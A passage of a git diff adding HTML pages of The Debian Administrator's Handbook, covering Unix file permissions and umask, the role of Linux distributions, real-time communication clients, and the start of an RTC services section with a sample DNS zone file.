+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.remote-login.html"
+        title="9.2. Remote Login" /><link
+        rel="next"
+        href="sect.administration-interfaces.html"
+        title="9.4. Administration Interfaces" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.rights-management.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.remote-login.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.administration-interfaces.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.rights-management"></a>9.3. Managing Rights</h2></div></div></div><div
+          class="para">
+			Linux is definitely a multi-user system, so it is necessary to provide a permission system to control the set of authorized operations on files and directories, which includes all the system resources and devices (on a Unix system, any device is represented by a file or directory). This principle is common to all Unix systems, but a reminder is always useful, especially as there are some interesting and relatively unknown advanced uses.
+		</div><a
+          id="id-1.12.6.3"
+          class="indexterm"></a><a
+          id="id-1.12.6.4"
+          class="indexterm"></a><a
+          id="id-1.12.6.5"
+          class="indexterm"></a><a
+          id="id-1.12.6.6"
+          class="indexterm"></a><a
+          id="id-1.12.6.7"
+          class="indexterm"></a><a
+          id="id-1.12.6.8"
+          class="indexterm"></a><div
+          class="para">
+			Each file or directory has specific permissions for three categories of users:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					its owner (symbolized by <code
+                  class="literal">u</code> as in “user”);
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					its owner group (symbolized by <code
+                  class="literal">g</code> as in “group”), representing all the members of the group;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					the others (symbolized by <code
+                  class="literal">o</code> as in “other”).
+				</div></li></ul></div><div
+          class="para">
+			Three types of rights can be combined:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					reading (symbolized by <code
+                  class="literal">r</code> as in “read”);
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					writing (or modifying, symbolized by <code
+                  class="literal">w</code> as in “write”);
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					executing (symbolized by <code
+                  class="literal">x</code> as in “eXecute”).
+				</div></li></ul></div><a
+          id="id-1.12.6.13"
+          class="indexterm"></a><a
+          id="id-1.12.6.14"
+          class="indexterm"></a><a
+          id="id-1.12.6.15"
+          class="indexterm"></a><a
+          id="id-1.12.6.16"
+          class="indexterm"></a><div
+          class="para">
+			In the case of a file, these rights are easily understood: read access allows reading the content (including copying), write access allows changing it, and execute access allows you to run it (which will only work if it is a program).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SECURITY</em></span> <code
+                      class="literal">setuid</code> and <code
+                      class="literal">setgid</code> executables</strong></p></div></div></div><div
+            class="para">
+			Two particular rights are relevant to executable files: <code
+              class="literal">setuid</code> and <code
+              class="literal">setgid</code> (symbolized with the letter “s”). Note that we frequently speak of “bit”, since each of these boolean values can be represented by a 0 or a 1. These two rights allow any user to execute the program with the rights of the owner or the group, respectively. This mechanism grants access to features requiring higher level permissions than those you would usually have.
+		</div><a
+            id="id-1.12.6.18.3"
+            class="indexterm"></a><a
+            id="id-1.12.6.18.4"
+            class="indexterm"></a><div
+            class="para">
+			Since a <code
+              class="literal">setuid</code> root program is systematically run under the super-user identity, it is very important to ensure it is secure and reliable. Indeed, a user who would manage to subvert it to call a command of their choice could then impersonate the root user and have all rights on the system.
+		</div></div><div
+          class="para">
+			A directory is handled differently. Read access gives the right to consult the list of its entries (files and directories), write access allows creating or deleting files, and execute access allows crossing through it (especially to go there with the <code
+            class="command">cd</code> command). Being able to cross through a directory without being able to read it gives permission to access the entries therein that are known by name, but not to find them if you do not know their existence or their exact name.
+		</div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.setgid-dir"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>SECURITY</em></span> <code
+                      class="literal">setgid</code> directory and <span
+                      class="emphasis"><em>sticky bit</em></span></strong></p></div></div></div><a
+            id="id-1.12.6.20.2"
+            class="indexterm"></a><div
+            class="para">
+			The <code
+              class="literal">setgid</code> bit also applies to directories. Any newly-created item in such directories is automatically assigned the owner group of the parent directory, instead of inheriting the creator's main group as usual. This setup avoids the user having to change its main group (with the <code
+              class="command">newgrp</code> command) when working in a file tree shared between several users of the same dedicated group.
+		</div><a
+            id="id-1.12.6.20.4"
+            class="indexterm"></a><div
+            class="para">
+			The “sticky” bit (symbolized by the letter “t”) is a permission that is only useful in directories. It is especially used for temporary directories where everybody has write access (such as <code
+              class="filename">/tmp/</code>): it restricts deletion of files so that only their owner (or the owner of the parent directory) can do it. Lacking this, everyone could delete other users' files in <code
+              class="filename">/tmp/</code>.
+		</div></div><div
+          class="para">
+			Three commands control the permissions associated with a file:
+		</div><div
+          xmlns:d="http://docbook.org/ns/docbook"
+          class="itemizedlist"><ul><li
+              class="listitem"><div
+                class="para">
+					<code
+                  class="command">chown <em
+                    class="replaceable">user</em> <em
+                    class="replaceable">file</em></code> changes the owner of the file;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					<code
+                  class="command">chgrp <em
+                    class="replaceable">group</em> <em
+                    class="replaceable">file</em></code> alters the owner group;
+				</div></li><li
+              class="listitem"><div
+                class="para">
+					<code
+                  class="command">chmod <em
+                    class="replaceable">rights</em> <em
+                    class="replaceable">file</em></code> changes the permissions for the file.
+				</div></li></ul></div><div
+          class="para">
+			There are two ways of presenting rights. Among them, the symbolic representation is probably the easiest to understand and remember. It involves the letter symbols mentioned above. You can define rights for each category of users (<code
+            class="literal">u</code>/<code
+            class="literal">g</code>/<code
+            class="literal">o</code>), by setting them explicitly (with <code
+            class="literal">=</code>), by adding (<code
+            class="literal">+</code>), or subtracting (<code
+            class="literal">-</code>). Thus the <code
+            class="literal">u=rwx,g+rw,o-r</code> formula gives the owner read, write, and execute rights, adds read and write rights for the owner group, and removes read rights for other users. Rights not altered by the addition or subtraction in such a command remain unmodified. The letter <code
+            class="literal">a</code>, for “all”, covers all three categories of users, so that <code
+            class="literal">a=rx</code> grants all three categories the same rights (read and execute, but not write).
+		</div><a
+          id="id-1.12.6.24"
+          class="indexterm"></a><a
+          id="id-1.12.6.25"
+          class="indexterm"></a><a
+          id="id-1.12.6.26"
+          class="indexterm"></a><a
+          id="id-1.12.6.27"
+          class="indexterm"></a><a
+          id="id-1.12.6.28"
+          class="indexterm"></a><div
+          class="para">
+			The (octal) numeric representation associates each right with a value: 4 for read, 2 for write, and 1 for execute. We associate each combination of rights with the sum of the figures. Each value is then assigned to different categories of users by putting them end to end in the usual order (owner, group, others).
+		</div><div
+          class="para">
+			For instance, the <code
+            class="command">chmod 754 <em
+              class="replaceable">file</em></code> command will set the following rights: read, write and execute for the owner (since 7 = 4 + 2 + 1); read and execute for the group (since 5 = 4 + 1); read-only for others. The <code
+            class="literal">0</code> means no rights; thus <code
+            class="command">chmod 600 <em
+              class="replaceable">file</em></code> allows for read/write rights for the owner, and no rights for anyone else. The most frequent right combinations are <code
+            class="literal">755</code> for executable files and directories, and <code
+            class="literal">644</code> for data files.
+		</div><div
+          class="para">
+			To represent special rights, you can prefix a fourth digit to this number according to the same principle, where the <code
+            class="literal">setuid</code>, <code
+            class="literal">setgid</code> and <code
+            class="literal">sticky</code> bits are 4, 2 and 1, respectively. <code
+            class="command">chmod 4754</code> will associate the <code
+            class="literal">setuid</code> bit with the previously described rights.
+		</div><div
+          class="para">
+			Note that the use of octal notation only allows to set all the rights at once on a file; you cannot use it to simply add a new right, such as read access for the group owner, since you must take into account the existing rights and compute the new corresponding numerical value.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Recursive operation</strong></p></div></div></div><div
+            class="para">
+			Sometimes we have to change rights for an entire file tree. All the commands above have a <code
+              class="literal">-R</code> option to operate recursively in sub-directories.
+		</div><div
+            class="para">
+			The distinction between directories and files sometimes causes problems with recursive operations. That is why the “X” letter has been introduced in the symbolic representation of rights. It represents a right to execute which applies only to directories (and not to files lacking this right). Thus, <code
+              class="command">chmod -R a+X <em
+                class="replaceable">directory</em></code> will only add execute rights for all categories of users (<code
+              class="literal">a</code>) for all of the sub-directories and files for which at least one category of user (even if their sole owner) already has execute rights.
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Changing the user and group</strong></p></div></div></div><div
+            class="para">
+			Frequently you want to change the group of a file at the same time that you change the owner. The <code
+              class="command">chown</code> command has a special syntax for that: <code
+              class="command">chown <em
+                class="replaceable">user</em>:<em
+                class="replaceable">group</em> <em
+                class="replaceable">file</em></code>
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>GOING FURTHER</em></span> <code
+                      class="command">umask</code></strong></p></div></div></div><div
+            class="para">
+			When an application creates a file, it assigns indicative permissions, knowing that the system automatically removes certain rights, given by the command <code
+              class="command">umask</code>. Enter <code
+              class="command">umask</code> in a shell; you will see a mask such as <code
+              class="computeroutput">0022</code>. This is simply an octal representation of the rights to be systematically removed (in this case, the write right for the group and other users).
+		</div><a
+            id="id-1.12.6.35.3"
+            class="indexterm"></a><a
+            id="id-1.12.6.35.4"
+            class="indexterm"></a><a
+            id="id-1.12.6.35.5"
+            class="indexterm"></a><div
+            class="para">
+			If you give it a new octal value, the <code
+              class="command">umask</code> command modifies the mask. Used in a shell initialization file (for example, <code
+              class="filename">~/.bash_profile</code>), it will effectively change the default mask for your work sessions.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.remote-login.html"><strong>Předcházející</strong>9.2. Remote Login</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.administration-interfaces.html"><strong>Další</strong>9.4. Administration Interfaces</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.role-of-distributions.html b/tmp/cs-CZ/html/sect.role-of-distributions.html
new file mode 100644
index 000000000..cfc72b16d
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.role-of-distributions.html
@@ -0,0 +1,115 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">1.5. The Role of Distributions</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Cíl, Prostředky, Operace, Dobrovolník" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="the-debian-project.html"
+        title="Kapitola 1. Projekt Debian" /><link
+        rel="prev"
+        href="sect.follow-debian-news.html"
+        title="1.4. Follow Debian News" /><link
+        rel="next"
+        href="sect.release-lifecycle.html"
+        title="1.6. Lifecycle of a Release" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.role-of-distributions.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.follow-debian-news.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.release-lifecycle.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.role-of-distributions"></a>1.5. The Role of Distributions</h2></div></div></div><a
+          id="id-1.4.8.2"
+          class="indexterm"></a><div
+          class="para">
+			A GNU/Linux distribution has two main objectives: install a free operating system on a computer (either with or without an existing system or systems), and provide a range of software covering all of the users' needs.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.8.4"></a>1.5.1. The Installer: <code
+                    class="command">debian-installer</code></h3></div></div></div><div
+            class="para">
+				The <code
+              class="command">debian-installer</code>, designed to be extremely modular in order to be as generic as possible, targets the first objective. It covers a broad range of installation situations and in general, greatly facilitates the creation of a derivative installer corresponding to a particular case.
+			</div><div
+            class="para">
+				This modularity, which also makes it very complex, may be daunting for the developers discovering this tool; but whether used in graphical or text mode, the user's experience is still similar. Great efforts have been made to reduce the number of questions asked at installation time, in particular thanks to the inclusion of automatic hardware detection software.
+			</div><div
+            class="para">
+				It is interesting to note that distributions derived from Debian differ greatly on this aspect, and provide a more limited installer (often confined to the i386 or amd64 architectures), but more user-friendly for the uninitiated. On the other hand, they usually refrain from straying too far from package contents in order to benefit as much as possible from the vast range of software offered without causing compatibility problems.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.4.8.5"></a>1.5.2. The Software Library</h3></div></div></div><div
+            class="para">
+				Quantitatively, Debian is undeniably the leader in this respect, with over 25,000 source packages. Qualitatively, Debian’s policy and long testing period prior to releasing a new stable version justify its reputation for stability and consistency. As far as availability, everything is available on-line through many mirrors worldwide, with updates pushed out every six hours.
+			</div><div
+            class="para">
+				Many retailers sell DVD-ROMs on the Internet at a very low price (often at cost), the “images” for which are freely available for download. There is only one drawback: the low frequency of releases of new stable versions (their development sometimes takes more than two years), which delays the inclusion of new software.
+			</div><div
+            class="para">
+				Most new free software programs quickly find their way into the development version which allows them to be installed. If this requires too many updates due to their dependencies, the program can also be recompiled for the stable version of Debian (see <a
+              class="xref"
+              href="debian-packaging.html">15 – „<em>Creating a Debian Package</em>“</a> for more information on this topic).
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.follow-debian-news.html"><strong>Předcházející</strong>1.4. Follow Debian News</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.release-lifecycle.html"><strong>Další</strong>1.6. Lifecycle of a Release</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.rtc-clients.html b/tmp/cs-CZ/html/sect.rtc-clients.html
new file mode 100644
index 000000000..787474b53
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.rtc-clients.html
@@ -0,0 +1,199 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.10. Real-Time Communications software</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.windows-emulation.html"
+        title="13.9. Emulating Windows: Wine" /><link
+        rel="next"
+        href="security.html"
+        title="Kapitola 14. Security" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.rtc-clients.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.windows-emulation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="security.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.rtc-clients"></a>13.10. Real-Time Communications software</h2></div></div></div><div
+          class="para">
+			Debian provides a wide range of Real-Time Communications (RTC) client software. The setup of RTC servers is discussed in <a
+            class="xref"
+            href="sect.rtc-services.html">11.8 – „Real-Time Communication Services“</a>. In SIP terminology, a client application or device is also referred to as a user agent.
+		</div><a
+          id="id-1.16.13.3"
+          class="indexterm"></a><a
+          id="id-1.16.13.4"
+          class="indexterm"></a><div
+          class="para">
+			Each client application varies in functionality. Some applications are more convenient for intensive chat users while other applications are more stable for webcam users. It may be necessary to test several applications to identify those which are most satisfactory. A user may finally decide that they need more than one application, for example, an XMPP application for messaging with customers and an IRC application for collaboration with some online communities.
+		</div><div
+          class="para">
+			To maximize the ability of users to communicate with the wider world, it is recommended to configure both SIP and XMPP clients or a single client that supports both protocols.
+		</div><a
+          id="id-1.16.13.7"
+          class="indexterm"></a><a
+          id="id-1.16.13.8"
+          class="indexterm"></a><div
+          class="para">
+			The default GNOME desktop suggests the Empathy communications client. Empathy can support both SIP and XMPP. It supports instant messaging (IM), voice and video. The KDE project provides KDE Telepathy, a communications client based on the same underlying Telepathy APIs used by the GNOME Empathy client.
+		</div><a
+          id="id-1.16.13.10"
+          class="indexterm"></a><a
+          id="id-1.16.13.11"
+          class="indexterm"></a><div
+          class="para">
+			Popular alternatives to Empathy/Telepathy include Ekiga, Linphone, Psi and Ring (formerly known as SFLphone).
+		</div><a
+          id="id-1.16.13.13"
+          class="indexterm"></a><a
+          id="id-1.16.13.14"
+          class="indexterm"></a><a
+          id="id-1.16.13.15"
+          class="indexterm"></a><a
+          id="id-1.16.13.16"
+          class="indexterm"></a><a
+          id="id-1.16.13.17"
+          class="indexterm"></a><div
+          class="para">
+			Some of these applications can also interact with mobile users using apps such as Lumicall on Android. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://lumicall.org">https://lumicall.org</a></div>
+		</div><a
+          id="id-1.16.13.19"
+          class="indexterm"></a><div
+          class="para">
+			The <span
+            class="emphasis"><em>Real-Time Communications Quick Start Guide</em></span> has a chapter dedicated to client software. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://rtcquickstart.org/guide/multi/useragents.html">http://rtcquickstart.org/guide/multi/useragents.html</a></div>
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Look for clients supporting ICE and TURN</strong></p></div></div></div><div
+            class="para">
+			Some RTC clients have significant problems sending voice and video through firewalls and NAT networks. Users may receive ghost calls (their phone rings but they don't hear the other person) or they may not be able to call at all.
+		</div><div
+            class="para">
+			The ICE and TURN protocols were developed to resolve these issues. Operating a TURN server with public IP addresses in each site and using client software that supports both ICE and TURN gives the best user experience.
+		</div><div
+            class="para">
+			If the client software is only intended for instant messaging, there is no requirement for ICE or TURN support.
+		</div></div><div
+          class="para">
+			Debian Developers operate a community SIP service at <a
+            href="https://rtc.debian.org">rtc.debian.org</a>. The community maintains a wiki with documentation about setting up many of the client applications packaged in Debian. The wiki articles and screenshots are a useful resource for anybody setting up a similar service on their own domain. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://wiki.debian.org/UnifiedCommunications/DebianDevelopers/UserGuide">https://wiki.debian.org/UnifiedCommunications/DebianDevelopers/UserGuide</a></div>
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Internet Relay Chat</strong></p></div></div></div><div
+            class="para">
+			IRC can also be considered, in addition to SIP and XMPP. IRC is more oriented around the concept of channels, the name of which starts with a hash sign <code
+              class="literal">#</code>. Each channel is usually targeted at a specific topic and any number of people can join a channel to discuss it (but users can still have one-to-one private conversations if needed). The IRC protocol is older, and does not allow end-to-end encryption of the messages; it is still possible to encrypt the communications between the users and the server by tunneling the IRC protocol inside SSL.
+		</div><a
+            id="id-1.16.13.23.3"
+            class="indexterm"></a><a
+            id="id-1.16.13.23.4"
+            class="indexterm"></a><div
+            class="para">
+			IRC clients are a bit more complex, and they usually provide many features that are of limited use in a corporate environment. For instance, channel “operators” are users endowed with the ability to kick other users from a channel, or even ban them permanently, when the normal discussion is disrupted.
+		</div><div
+            class="para">
+			Since the IRC protocol is very old, many clients are available to cater for many user groups; examples include XChat (only available in <span
+              class="distribution distribution">stretch-backports</span>, not in <span
+              class="distribution distribution">stretch</span>), and Smuxi (graphical clients based on GTK+), Irssi (text mode), Circe (integrated to Emacs), and so on.
+		</div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>QUICK LOOK</em></span> Video conferencing with Ekiga</strong></p></div></div></div><div
+            class="para">
+			Ekiga (formerly GnomeMeeting) is a prominent application for Linux video conferencing. It is both stable and functional, and is very easily used on a local network; setting up the service on a global network is much more complex when the firewalls involved lack explicit support for the H323 and/or SIP teleconferencing protocols with all their quirks.
+		</div><a
+            id="id-1.16.13.24.3"
+            class="indexterm"></a><a
+            id="id-1.16.13.24.4"
+            class="indexterm"></a><div
+            class="para">
+			If only one Ekiga client is to run behind the firewall, the configuration is rather straightforward, and only involves forwarding a few ports to the dedicated host: TCP port 1720 (listening for incoming connections), TCP port 5060 (for SIP), TCP ports 30000 to 30010 (for control of open connections) and UDP ports 5000 to 5100 (for audio and video data transmission and registration to an H323 proxy).
+		</div><a
+            id="id-1.16.13.24.6"
+            class="indexterm"></a><a
+            id="id-1.16.13.24.7"
+            class="indexterm"></a><div
+            class="para">
+			When several Ekiga clients are to run behind the firewall, complexity increases notably. An H323 proxy (for instance the <span
+              class="pkg pkg">gnugk</span> package) must be set up, and its configuration is far from simple.
+		</div><a
+            id="id-1.16.13.24.9"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.windows-emulation.html"><strong>Předcházející</strong>13.9. Emulating Windows: Wine</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="security.html"><strong>Další</strong>Kapitola 14. Security</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.rtc-services.html b/tmp/cs-CZ/html/sect.rtc-services.html
new file mode 100644
index 000000000..5c70111c3
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.rtc-services.html
@@ -0,0 +1,524 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.8. Real-Time Communication Services</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="network-services.html"
+        title="Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN" /><link
+        rel="prev"
+        href="sect.ldap-directory.html"
+        title="11.7. LDAP Directory" /><link
+        rel="next"
+        href="advanced-administration.html"
+        title="Kapitola 12. Advanced Administration" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.rtc-services.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ldap-directory.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="advanced-administration.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.rtc-services"></a>11.8. Real-Time Communication Services</h2></div></div></div><div
+          class="para">
+			Real-Time Communication (RTC) services include voice, video/webcam, instant messaging (IM) and desktop sharing. This chapter gives a brief introduction to three of the services required to operate RTC, including a TURN server, SIP server and XMPP server. Comprehensive details of how to plan, install and manage these services are available in the Real-Time Communications Quick Start Guide which includes examples specific to Debian. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://rtcquickstart.org">http://rtcquickstart.org</a></div>
+		</div><a
+          id="id-1.14.11.3"
+          class="indexterm"></a><a
+          id="id-1.14.11.4"
+          class="indexterm"></a><a
+          id="id-1.14.11.5"
+          class="indexterm"></a><a
+          id="id-1.14.11.6"
+          class="indexterm"></a><div
+          class="para">
+			Both SIP and XMPP can provide the same functionality. SIP is slightly more well known for voice and video while XMPP is traditionally regarded as an IM protocol. In fact, they can both be used for any of these purposes. To maximize connectivity options, it is recommended to run both in parallel.
+		</div><a
+          id="id-1.14.11.8"
+          class="indexterm"></a><a
+          id="id-1.14.11.9"
+          class="indexterm"></a><div
+          class="para">
+			These services rely on X.509 certificates both for authentication and confidentiality purposes. See <a
+            class="xref"
+            href="sect.virtual-private-network.html#sect.easy-rsa">10.2.1.1 – „Public Key Infrastructure: <span
+              class="emphasis"><em>easy-rsa</em></span>“</a> for details on how to create them. Alternatively the <span
+            class="emphasis"><em>Real-Time Communications Quick Start Guide</em></span> also has some useful explanations: <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://rtcquickstart.org/guide/multi/tls.html">http://rtcquickstart.org/guide/multi/tls.html</a></div>
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rtc-dns-settings"></a>11.8.1. DNS settings for RTC services</h3></div></div></div><div
+            class="para">
+				RTC services require DNS SRV and NAPTR records. A sample configuration that can be placed in the zone file for <code
+              class="literal">falcot.com</code>:
+			</div><a
+            id="id-1.14.11.11.3"
+            class="indexterm"></a><a
+            id="id-1.14.11.11.4"
+            class="indexterm"></a><pre
+            class="programlisting">
+; the server where everything will run
+server1            IN     A      198.51.100.19
+server1            IN     AAAA   2001:DB8:1000:2000::19
+
+; IPv4 only for TURN for now, some clients are buggy with IPv6
+turn-server        IN     A      198.51.100.19
+
